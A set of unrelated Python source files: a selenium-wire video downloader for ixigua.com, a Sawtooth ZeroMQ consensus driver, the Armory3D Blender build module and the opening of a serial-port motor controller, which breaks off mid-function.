download_video_from_list.py
|
import os
from seleniumwire import webdriver
from selenium.webdriver.chrome.options import Options
from seleniumwire.request import Response
from webdriver_manager.chrome import ChromeDriverManager
import wget
from videoprops import get_video_properties
import multiprocessing as mp
"""
The audio and video streams are downloaded as separate files. To combine them, you need to install and use FFmpeg.
For Windows users on an N edition, you also need to install the Media Feature Pack so that ffmpeg can run properly.
Find your Windows build version and download the matching Media Feature Pack here:
https://support.microsoft.com/en-us/topic/media-feature-pack-list-for-windows-n-editions-c1c6fffa-d052-8338-7a79-a4bb980a700a
"""
DOWNLOAD_FOLDER = "D:\\Colorful_Update\\"
NUM_PROC = 4
LIST_FILE = "vlist.txt"
def download_video(title, html_url):
mp4_file = DOWNLOAD_FOLDER + title + '.mp4'
mp4_tmp = DOWNLOAD_FOLDER + title + '_.mp4'
mp3_file = DOWNLOAD_FOLDER + title + '.mp3'
if os.path.exists(mp4_file):
return "Exists"
chrome_options = Options()
chrome_options.add_argument('--headless')
    chrome_options.add_argument('--user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15')
driver = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=chrome_options)
driver.get(html_url)
driver.implicitly_wait(9)
elems = driver.find_elements_by_xpath('//div[@class="commentList"]')
print(title)
video_links = {}
max_video_size = -1
max_video_link = None
max_audio_size = -1
max_audio_link = None
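    # Scan the network traffic captured by selenium-wire: the page serves audio and
    # video as separate 'video/mp4' responses, so keep the largest of each kind as
    # reported by the total size in the Content-Range header.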
for request in driver.requests:
if request.response:
if request.response.headers['Content-Type'] == 'video/mp4':
new_url, _ = request.url.split('&net=')
media_size = int(request.response.headers['Content-Range'].split('/')[-1])
if 'media-video-avc1' in new_url:
media_type = 'video'
if media_size > max_video_size:
max_video_link = new_url
max_video_size = media_size
else:
media_type = 'audio'
if media_size > max_audio_size:
max_audio_link = new_url
max_audio_size = media_size
if new_url not in video_links:
video_links[new_url] = (media_type, media_size)
print(video_links)
for k, info in video_links.items():
print("-" * 20)
print(k)
print(info)
print("=" * 20)
driver.close()
del driver
try:
mp3_file = mp3_file.replace('?', '')
mp4_tmp = mp4_tmp.replace('?', '')
mp4_file = mp4_file.replace('?', '')
wget.download(max_audio_link, out=mp3_file)
wget.download(max_video_link, out=mp4_tmp)
except Exception as e:
print(e)
print("Download Error", max_audio_link, max_video_link)
if os.path.exists(mp4_tmp) and os.path.exists(mp3_file):
os.system(f'ffmpeg -i "{mp4_tmp}" -i "{mp3_file}" -c copy "{mp4_file}"')
os.remove(mp4_tmp)
os.remove(mp3_file)
return "Done"
def main():
title_dict = {}
with open(LIST_FILE, 'r', encoding='utf-8') as f:
lines = f.readlines()
for line in lines:
if len(line.strip()) == 0:
continue
title, url = line.split('\t')
url = 'https://www.ixigua.com' + url.strip()
title = title.strip()
title_dict[url] = title
print(title_dict)
proceses = []
count = 0
items = list(title_dict.items())
while True:
if len(proceses) < NUM_PROC:
url, title = items[count]
p = mp.Process(target=download_video, args=(title, url))
proceses.append(p)
p.start()
count += 1
for idx, p in enumerate(proceses):
if not p.is_alive():
proceses.pop(idx)
p.join()
break
if count == len(items):
break
for p in proceses:
p.join()
if __name__ == '__main__':
main()
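# Note: the manual process bookkeeping in main() could also be expressed with a
# worker pool. A rough sketch of the same fan-out (not part of the original
# script, shown only for comparison):
#
#   with mp.Pool(NUM_PROC) as pool:
#       pool.starmap(download_video, [(title, url) for url, title in title_dict.items()])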
|
zmq_driver.py
|
# Copyright 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
import concurrent.futures
import logging
from queue import Queue
from threading import Thread
from sawtooth_sdk.consensus.driver import Driver
from sawtooth_sdk.consensus.engine import StartupState
from sawtooth_sdk.consensus.engine import PeerMessage
from sawtooth_sdk.consensus.zmq_service import ZmqService
from sawtooth_sdk.consensus import exceptions
from sawtooth_sdk.messaging.stream import Stream
from sawtooth_sdk.protobuf import consensus_pb2
from sawtooth_sdk.protobuf.validator_pb2 import Message
LOGGER = logging.getLogger(__name__)
REGISTER_TIMEOUT = 300
SERVICE_TIMEOUT = 300
class ZmqDriver(Driver):
def __init__(self, engine):
super().__init__(engine)
self._engine = engine
self._stream = None
self._exit = False
self._updates = None
def start(self, endpoint):
self._stream = Stream(endpoint)
startup_state = self._register()
# Validators version 1.1 send startup info with the registration
# response; newer versions will send an activation message with the
# startup info
if startup_state is None:
startup_state = self._wait_until_active()
self._updates = Queue()
driver_thread = Thread(
target=self._driver_loop)
driver_thread.start()
try:
self._engine.start(
self._updates,
ZmqService(
stream=self._stream,
timeout=SERVICE_TIMEOUT),
startup_state)
except Exception: # pylint: disable=broad-except
LOGGER.exception("Uncaught engine exception")
self.stop()
driver_thread.join()
def _driver_loop(self):
try:
future = self._stream.receive()
while True:
if self._exit:
self._engine.stop()
break
try:
message = future.result(1)
future = self._stream.receive()
except concurrent.futures.TimeoutError:
continue
result = self._process(message)
self._updates.put(result)
except Exception: # pylint: disable=broad-except
LOGGER.exception("Uncaught driver exception")
def stop(self):
self._exit = True
self._engine.stop()
self._stream.close()
def _register(self):
self._stream.wait_for_ready()
request = consensus_pb2.ConsensusRegisterRequest(
name=self._engine.name(),
version=self._engine.version(),
).SerializeToString()
while True:
future = self._stream.send(
message_type=Message.CONSENSUS_REGISTER_REQUEST,
content=request)
response = consensus_pb2.ConsensusRegisterResponse()
response.ParseFromString(future.result(REGISTER_TIMEOUT).content)
if (
response.status
== consensus_pb2.ConsensusRegisterResponse.NOT_READY
):
continue
if response.status == consensus_pb2.ConsensusRegisterResponse.OK:
if (
response.HasField('chain_head')
and response.HasField('local_peer_info')
):
return StartupState(
response.chain_head,
response.peers,
response.local_peer_info)
return None
raise exceptions.ReceiveError(
'Registration failed with status {}'.format(response.status))
def _wait_until_active(self):
future = self._stream.receive()
while True:
try:
message = future.result(1)
except concurrent.futures.TimeoutError:
continue
if (
message.message_type
== Message.CONSENSUS_NOTIFY_ENGINE_ACTIVATED
):
notification = \
consensus_pb2.ConsensusNotifyEngineActivated()
notification.ParseFromString(message.content)
startup_state = StartupState(
notification.chain_head,
notification.peers,
notification.local_peer_info)
LOGGER.info(
'Received activation message with startup state: %s',
startup_state)
self._stream.send_back(
message_type=Message.CONSENSUS_NOTIFY_ACK,
correlation_id=message.correlation_id,
content=consensus_pb2.ConsensusNotifyAck()
.SerializeToString())
return startup_state
            LOGGER.warning(
                'Received message type %s while waiting for '
                'activation message', message.message_type)
future = self._stream.receive()
def _process(self, message):
type_tag = message.message_type
if type_tag == Message.CONSENSUS_NOTIFY_PEER_CONNECTED:
notification = consensus_pb2.ConsensusNotifyPeerConnected()
notification.ParseFromString(message.content)
data = notification.peer_info
elif type_tag == Message.CONSENSUS_NOTIFY_PEER_DISCONNECTED:
notification = consensus_pb2.ConsensusNotifyPeerDisconnected()
notification.ParseFromString(message.content)
data = notification.peer_id
elif type_tag == Message.CONSENSUS_NOTIFY_PEER_MESSAGE:
notification = consensus_pb2.ConsensusNotifyPeerMessage()
notification.ParseFromString(message.content)
header = consensus_pb2.ConsensusPeerMessageHeader()
header.ParseFromString(notification.message.header)
peer_message = PeerMessage(
header=header,
header_bytes=notification.message.header,
header_signature=notification.message.header_signature,
content=notification.message.content)
data = peer_message, notification.sender_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_NEW:
notification = consensus_pb2.ConsensusNotifyBlockNew()
notification.ParseFromString(message.content)
data = notification.block
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_VALID:
notification = consensus_pb2.ConsensusNotifyBlockValid()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_INVALID:
notification = consensus_pb2.ConsensusNotifyBlockInvalid()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_COMMIT:
notification = consensus_pb2.ConsensusNotifyBlockCommit()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_ENGINE_DEACTIVATED:
self.stop()
data = None
else:
raise exceptions.ReceiveError(
'Received unexpected message type: {}'.format(type_tag))
self._stream.send_back(
message_type=Message.CONSENSUS_NOTIFY_ACK,
correlation_id=message.correlation_id,
content=consensus_pb2.ConsensusNotifyAck().SerializeToString())
return type_tag, data
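# Usage sketch, derived from the interface above: a consensus engine instance is
# passed to the driver, which then connects to the validator's consensus endpoint.
# `MyEngine` and the endpoint URL are placeholders, not part of this module.
#
#   driver = ZmqDriver(MyEngine())
#   driver.start(endpoint='tcp://localhost:5050')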
|
make.py
|
import os
import glob
import time
import shutil
import bpy
import json
import stat
from bpy.props import *
import subprocess
import threading
import webbrowser
import arm.utils
import arm.write_data as write_data
import arm.make_logic as make_logic
import arm.make_renderpath as make_renderpath
import arm.make_world as make_world
import arm.make_state as state
import arm.assets as assets
import arm.log as log
import arm.lib.make_datas
import arm.lib.server
from arm.exporter import ArmoryExporter
exporter = ArmoryExporter()
scripts_mtime = 0 # Monitor source changes
profile_time = 0
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
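# run_proc() is the small building block used throughout this module: it starts a
# process and fires an optional callback from a watcher thread once the process
# exits. A minimal usage sketch (the command is only an example):
#
#   def on_done():
#       print('child process finished')
#
#   proc = run_proc(['node', '--version'], on_done)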
def compile_shader_pass(res, raw_shaders_path, shader_name, defs, make_variants):
os.chdir(raw_shaders_path + '/' + shader_name)
# Open json file
json_name = shader_name + '.json'
with open(json_name) as f:
json_file = f.read()
json_data = json.loads(json_file)
fp = arm.utils.get_fp_build()
arm.lib.make_datas.make(res, shader_name, json_data, fp, defs, make_variants)
path = fp + '/compiled/Shaders'
c = json_data['contexts'][0]
for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
if s in c:
shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def export_data(fp, sdk_path):
global exporter
wrd = bpy.data.worlds['Arm']
print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
# Clean compiled variants if cache is disabled
build_dir = arm.utils.get_fp_build()
if wrd.arm_cache_build == False:
if os.path.isdir(build_dir + '/debug/html5-resources'):
shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/krom-resources'):
shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/debug/krom-resources'):
shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/windows-resources'):
shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/linux-resources'):
shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/osx-resources'):
shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
raw_shaders_path = sdk_path + '/armory/Shaders/'
assets_path = sdk_path + '/armory/Assets/'
export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
assets.reset()
# Build node trees
ArmoryExporter.import_traits = []
make_logic.build()
make_world.build()
make_renderpath.build()
# Export scene data
assets.embedded_data = sorted(list(set(assets.embedded_data)))
physics_found = False
navigation_found = False
ui_found = False
ArmoryExporter.compress_enabled = state.is_publish and wrd.arm_asset_compression
ArmoryExporter.optimize_enabled = state.is_publish and wrd.arm_optimize_data
for scene in bpy.data.scenes:
if scene.arm_export:
ext = '.zip' if ArmoryExporter.compress_enabled else '.arm'
asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
exporter.execute(bpy.context, asset_path, scene=scene)
if ArmoryExporter.export_physics:
physics_found = True
if ArmoryExporter.export_navigation:
navigation_found = True
if ArmoryExporter.export_ui:
ui_found = True
assets.add(asset_path)
if physics_found == False: # Disable physics if no rigid body is exported
export_physics = False
if navigation_found == False:
export_navigation = False
if ui_found == False:
export_ui = False
if wrd.arm_ui == 'Enabled':
export_ui = True
modules = []
if wrd.arm_audio == 'Enabled':
modules.append('audio')
if export_physics:
modules.append('physics')
if export_navigation:
modules.append('navigation')
if export_ui:
modules.append('ui')
if wrd.arm_formatlib == 'Enabled':
modules.append('format')
print('Exported modules: ' + str(modules))
defs = arm.utils.def_strings_to_array(wrd.world_defs)
cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
print('Shader flags: ' + str(defs))
if wrd.arm_debug_console:
print('Khafile flags: ' + str(assets.khafile_defs))
# Render path is configurable at runtime
has_config = wrd.arm_write_config or os.path.exists(arm.utils.get_fp() + '/Bundled/config.arm')
# Write compiled.inc
shaders_path = build_dir + '/compiled/Shaders'
if not os.path.exists(shaders_path):
os.makedirs(shaders_path)
write_data.write_compiledglsl(defs + cdefs, make_variants=has_config)
# Write referenced shader passes
if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
res = {}
res['shader_datas'] = []
for ref in assets.shader_passes:
# Ensure shader pass source exists
if not os.path.exists(raw_shaders_path + '/' + ref):
continue
assets.shader_passes_assets[ref] = []
if ref.startswith('compositor_pass'):
compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs, make_variants=has_config)
else:
compile_shader_pass(res, raw_shaders_path, ref, defs, make_variants=has_config)
arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
for ref in assets.shader_passes:
for s in assets.shader_passes_assets[ref]:
assets.add_shader(shaders_path + '/' + s + '.glsl')
for file in assets.shaders_external:
name = file.split('/')[-1].split('\\')[-1]
target = build_dir + '/compiled/Shaders/' + name
if not os.path.exists(target):
shutil.copy(file, target)
state.last_world_defs = wrd.world_defs
# Reset path
os.chdir(fp)
# Copy std shaders
if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
# Write config.arm
resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
if wrd.arm_write_config:
write_data.write_config(resx, resy)
# Write khafile.js
enable_dce = state.is_publish and wrd.arm_dce
import_logic = not state.is_publish and arm.utils.logic_editor_space() != None
write_data.write_khafilejs(state.is_play, export_physics, export_navigation, export_ui, state.is_publish, enable_dce, ArmoryExporter.import_traits, import_logic)
# Write Main.hx - depends on write_khafilejs for writing number of assets
scene_name = arm.utils.get_project_scene_name()
write_data.write_mainhx(scene_name, resx, resy, state.is_play, state.is_publish)
if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
wrd.arm_recompile = True
state.last_resx = resx
state.last_resy = resy
state.last_scene = scene_name
def compile(assets_only=False):
wrd = bpy.data.worlds['Arm']
fp = arm.utils.get_fp()
os.chdir(fp)
# Set build command
target_name = state.target
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path]
kha_target_name = arm.utils.get_kha_target(target_name)
if kha_target_name != '':
cmd.append(kha_target_name)
# Custom exporter
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
if item.arm_project_target == 'custom' and item.arm_project_khamake != '':
for s in item.arm_project_khamake.split(' '):
cmd.append(s)
ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
if ffmpeg_path != '':
cmd.append('--ffmpeg')
cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
state.export_gapi = arm.utils.get_gapi()
cmd.append('-g')
cmd.append(state.export_gapi)
if arm.utils.get_legacy_shaders() or 'ios' in state.target:
if 'html5' in state.target or 'ios' in state.target:
pass
else:
cmd.append('--shaderversion')
cmd.append('110')
elif 'android' in state.target or 'html5' in state.target:
cmd.append('--shaderversion')
cmd.append('300')
else:
cmd.append('--shaderversion')
cmd.append('330')
if '_VR' in wrd.world_defs:
cmd.append('--vr')
cmd.append('webvr')
if arm.utils.get_rp().rp_renderer == 'Raytracer':
cmd.append('--raytrace')
cmd.append('dxr')
dxc_path = fp + '/HlslShaders/dxc.exe'
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/raytrace.cso', '-T', 'lib_6_3', fp + '/HlslShaders/raytrace.hlsl']).wait()
if arm.utils.get_khamake_threads() > 1:
cmd.append('--parallelAssetConversion')
cmd.append(str(arm.utils.get_khamake_threads()))
compilation_server = False
cmd.append('--to')
if (kha_target_name == 'krom' and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
cmd.append(arm.utils.build_dir() + '/debug')
# Start compilation server
if kha_target_name == 'krom' and arm.utils.get_compilation_server() and not assets_only and wrd.arm_cache_build:
compilation_server = True
arm.lib.server.run_haxe(arm.utils.get_haxe_path())
else:
cmd.append(arm.utils.build_dir())
if assets_only or compilation_server:
cmd.append('--nohaxe')
cmd.append('--noproject')
print("Running: ", cmd)
print("Using project from " + arm.utils.get_fp())
state.proc_build = run_proc(cmd, assets_done if compilation_server else build_done)
def build(target, is_play=False, is_publish=False, is_export=False):
global profile_time
profile_time = time.time()
state.target = target
state.is_play = is_play
state.is_publish = is_publish
state.is_export = is_export
# Save blend
if arm.utils.get_save_on_build():
bpy.ops.wm.save_mainfile()
log.clear()
# Set camera in active scene
active_scene = arm.utils.get_active_scene()
if active_scene.camera == None:
for o in active_scene.objects:
if o.type == 'CAMERA':
active_scene.camera = o
break
# Get paths
sdk_path = arm.utils.get_sdk_path()
raw_shaders_path = sdk_path + '/armory/Shaders/'
# Set dir
fp = arm.utils.get_fp()
os.chdir(fp)
# Create directories
wrd = bpy.data.worlds['Arm']
sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
if not os.path.exists(sources_path):
os.makedirs(sources_path)
# Save external scripts edited inside Blender
write_texts = False
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty:
write_texts = True
break
if write_texts:
area = bpy.context.area
old_type = area.type
area.type = 'TEXT_EDITOR'
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
area.spaces[0].text = text
bpy.ops.text.save()
area.type = old_type
# Save internal Haxe scripts
for text in bpy.data.texts:
if text.filepath == '' and text.name[-3:] == '.hx':
with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
f.write(text.as_string())
# Export data
export_data(fp, sdk_path)
if state.target == 'html5':
w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
write_data.write_indexhtml(w, h, is_publish)
# Bundle files from include dir
if os.path.isdir('include'):
dest = '/html5/' if is_publish else '/debug/html5/'
for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def play_done():
state.proc_play = None
state.redraw_ui = True
log.clear()
def assets_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
# Connect to the compilation server
os.chdir(arm.utils.build_dir() + '/debug/')
cmd = [arm.utils.get_haxe_path(), '--connect', '6000', 'project-krom.hxml']
state.proc_build = run_proc(cmd, compilation_server_done)
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def compilation_server_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
if os.path.exists('krom/krom.js'):
os.chmod('krom/krom.js', stat.S_IWRITE)
os.remove('krom/krom.js')
os.rename('krom/krom.js.temp', 'krom/krom.js')
build_done()
else:
state.proc_build = None
state.redraw_ui = True
log.print_info('Build failed, check console')
def build_done():
print('Finished in ' + str(time.time() - profile_time))
if state.proc_build == None:
return
result = state.proc_build.poll()
state.proc_build = None
state.redraw_ui = True
if result == 0:
bpy.data.worlds['Arm'].arm_recompile = False
build_success()
else:
log.print_info('Build failed, check console')
def patch():
if state.proc_build != None:
return
assets.invalidate_enabled = False
fp = arm.utils.get_fp()
os.chdir(fp)
asset_path = arm.utils.get_fp_build() + '/compiled/Assets/' + arm.utils.safestr(bpy.context.scene.name) + '.arm'
exporter.execute(bpy.context, asset_path, scene=bpy.context.scene)
if not os.path.isdir(arm.utils.build_dir() + '/compiled/Shaders/std'):
raw_shaders_path = arm.utils.get_sdk_path() + '/armory/Shaders/'
shutil.copytree(raw_shaders_path + 'std', arm.utils.build_dir() + '/compiled/Shaders/std')
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path, 'krom']
cmd.append('--shaderversion')
cmd.append('330')
cmd.append('--parallelAssetConversion')
cmd.append('4')
cmd.append('--to')
cmd.append(arm.utils.build_dir() + '/debug')
cmd.append('--nohaxe')
cmd.append('--noproject')
assets.invalidate_enabled = True
state.proc_build = run_proc(cmd, patch_done)
def patch_done():
js = 'iron.Scene.patch();'
write_patch(js)
state.proc_build = None
patch_id = 0
def write_patch(js):
global patch_id
with open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w') as f:
patch_id += 1
f.write(str(patch_id) + '\n')
f.write(js)
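# write_patch() is the hand-off point for live patching: debug/krom/krom.patch is
# rewritten with an incrementing id followed by the JavaScript to execute, which
# the running Krom instance then picks up (see patch_done() above, which pushes
# 'iron.Scene.patch();' through this path).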
def runtime_to_target():
wrd = bpy.data.worlds['Arm']
if wrd.arm_runtime == 'Krom':
return 'krom'
else:
return 'html5'
def get_khajs_path(target):
if target == 'krom':
return arm.utils.build_dir() + '/debug/krom/krom.js'
else: # Browser
return arm.utils.build_dir() + '/debug/html5/kha.js'
def play():
global scripts_mtime
wrd = bpy.data.worlds['Arm']
log.clear()
build(target=runtime_to_target(), is_play=True)
khajs_path = get_khajs_path(state.target)
if not wrd.arm_cache_build or \
not os.path.isfile(khajs_path) or \
assets.khafile_defs_last != assets.khafile_defs or \
state.last_target != state.target:
wrd.arm_recompile = True
state.last_target = state.target
# Trait sources modified
state.mod_scripts = []
script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
if os.path.isdir(script_path):
new_mtime = scripts_mtime
for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
mtime = os.path.getmtime(fn)
if scripts_mtime < mtime:
arm.utils.fetch_script_props(fn) # Trait props
fn = fn.split('Sources/')[1]
fn = fn[:-3] #.hx
fn = fn.replace('/', '.')
state.mod_scripts.append(fn)
wrd.arm_recompile = True
if new_mtime < mtime:
new_mtime = mtime
scripts_mtime = new_mtime
if len(state.mod_scripts) > 0: # Trait props
arm.utils.fetch_trait_props()
compile(assets_only=(not wrd.arm_recompile))
def build_success():
log.clear()
wrd = bpy.data.worlds['Arm']
if state.is_play:
if wrd.arm_runtime == 'Browser':
# Start server
os.chdir(arm.utils.get_fp())
t = threading.Thread(name='localserver', target=arm.lib.server.run_tcp)
t.daemon = True
t.start()
html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
webbrowser.open(html5_app_path)
elif wrd.arm_runtime == 'Krom':
if wrd.arm_live_patch:
open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w').close()
if arm.utils.get_os() == 'win':
bin_ext = '' if state.export_gapi == 'direct3d11' else '_' + state.export_gapi
else:
bin_ext = '' if state.export_gapi == 'opengl' else '_' + state.export_gapi
krom_location, krom_path = arm.utils.krom_paths(bin_ext=bin_ext)
os.chdir(krom_location)
cmd = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
if arm.utils.get_os() == 'win':
cmd.append('--consolepid')
cmd.append(str(os.getpid()))
cmd.append('--sound')
state.proc_play = run_proc(cmd, play_done)
elif state.is_publish:
sdk_path = arm.utils.get_sdk_path()
target_name = arm.utils.get_kha_target(state.target)
files_path = arm.utils.get_fp_build() + '/' + target_name
if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
# Minify JS
minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
if target_name == 'html5':
jsfile = files_path + '/kha.js'
else:
jsfile = files_path + '/krom.js'
args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
proc = subprocess.Popen(args)
proc.wait()
if target_name == 'krom':
# Copy Krom binaries
if state.target == 'krom-windows':
gapi = state.export_gapi
ext = '' if gapi == 'direct3d11' else '_' + gapi
krom_location = sdk_path + '/Krom/Krom' + ext + '.exe'
shutil.copy(krom_location, files_path + '/Krom.exe')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.exe'
os.rename(files_path + '/Krom.exe', files_path + '/' + krom_exe)
elif state.target == 'krom-linux':
krom_location = sdk_path + '/Krom/Krom'
shutil.copy(krom_location, files_path)
krom_exe = arm.utils.safestr(wrd.arm_project_name)
os.rename(files_path + '/Krom', files_path + '/' + krom_exe)
krom_exe = './' + krom_exe
else:
krom_location = sdk_path + '/Krom/Krom.app'
shutil.copytree(krom_location, files_path + '/Krom.app')
game_files = os.listdir(files_path)
for f in game_files:
f = files_path + '/' + f
if os.path.isfile(f):
shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.app'
os.rename(files_path + '/Krom.app', files_path + '/' + krom_exe)
# Serialize krom.js into krom.bin
if wrd.arm_minify_js:
cwd = os.getcwd()
fp = files_path
if state.target == 'krom-macos':
fp += '/' + krom_exe + '/Contents/MacOS'
krom_exe = './Krom'
os.chdir(fp)
args = [krom_exe, '.', '.', '--writebin']
proc = subprocess.Popen(args)
proc.wait()
os.chdir(cwd)
os.remove(fp + '/krom.js')
# Rename
ext = state.target.split('-')[-1] # krom-windows
new_files_path = files_path + '-' + ext
os.rename(files_path, new_files_path)
files_path = new_files_path
if target_name == 'html5':
print('Exported HTML5 package to ' + files_path)
elif target_name.startswith('ios') or target_name.startswith('osx'): # TODO: to macos
print('Exported XCode project to ' + files_path + '-build')
elif target_name.startswith('windows'):
print('Exported Visual Studio 2017 project to ' + files_path + '-build')
elif target_name.startswith('android-native'):
print('Exported Android Studio project to ' + files_path + '-build/' + arm.utils.safestr(wrd.arm_project_name))
elif target_name.startswith('krom'):
print('Exported Krom package to ' + files_path)
else:
print('Exported makefiles to ' + files_path + '-build')
def clean():
os.chdir(arm.utils.get_fp())
wrd = bpy.data.worlds['Arm']
# Remove build and compiled data
try:
if os.path.isdir(arm.utils.build_dir()):
shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
if os.path.isdir(arm.utils.get_fp() + '/build'): # Kode Studio build dir
shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
except:
print('Armory Warning: Some files in the build folder are locked')
# Remove compiled nodes
pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
nodes_path = 'Sources/' + pkg_dir + '/node/'
if os.path.isdir(nodes_path):
shutil.rmtree(nodes_path, onerror=remove_readonly)
# Remove khafile/korefile/Main.hx
if os.path.isfile('khafile.js'):
os.remove('khafile.js')
if os.path.isfile('korefile.js'):
os.remove('korefile.js')
if os.path.isfile('Sources/Main.hx'):
os.remove('Sources/Main.hx')
# Remove Sources/ dir if empty
if os.path.exists('Sources/' + pkg_dir) and os.listdir('Sources/' + pkg_dir) == []:
shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
if os.path.exists('Sources') and os.listdir('Sources') == []:
shutil.rmtree('Sources/', onerror=remove_readonly)
# To recache signatures for batched materials
for mat in bpy.data.materials:
mat.signature = ''
mat.arm_cached = False
# Restart compilation server
if arm.utils.get_compilation_server():
arm.lib.server.kill_haxe()
print('Project cleaned')
|
DDbackend.py
|
from serial import Serial
from threading import Thread, Lock
class DaisyDriver(Serial):
def __init__(self, connected = True):
# check for connection bool to allow for dummy DaisyDriver object
# if not connected
if connected:
# initialise DaisyDriver serial object (hard code serial address for now)
super(DaisyDriver, self).__init__('/dev/ttyACM0')
# set initial speed (0,1,2 for low,medium,high respectively)
self.speedset(2)
# initialise jog lock
self.joglock = Lock()
# initialise direction dictionary, f = forward, fl = forward left etc...
self.directions = {'l':(0, -1, 0),
'r':(0, 1, 0),
'f':(-1, 0, 0),
'fl':(-1, -1, 0),
'fr':(-1, 1, 0),
'b':(1, 0, 0),
'bl':(1, -1, 0),
'br':(1, 1, 0),
'u':(0, 0, -1),
'd':(0, 0, 1)}
elif not connected:
# just set default speedval for slider to read
self.speedval = 2
# state value of light, assumes on then switches off
self.lightval = 1
self.light_off()
def speedset(self, val):
# speed val
self.speedval = val
# value from slider equals 0, 1 or 2. Use list for converting
# slider index to step motor speed
speeds = [50, 275, 500]
# serial command
command = 'STV 0 {V} {V} {V} \r'.format(V=speeds[self.speedval])
# convert to byte string
bytes_command = command.encode('utf-8')
# write command
self.write(bytes_command)
# flush buffer
self.flush()
def __jogdo(self, x, y, z):
# enable lock
with self.joglock:
# flush buffer
self.flush()
# serial command
command = 'JOG 0 {x_} {y_} {z_} \r'.format(x_=x, y_=y, z_=z)
# convert to byte string
bytes_command = command.encode('utf-8')
# write command
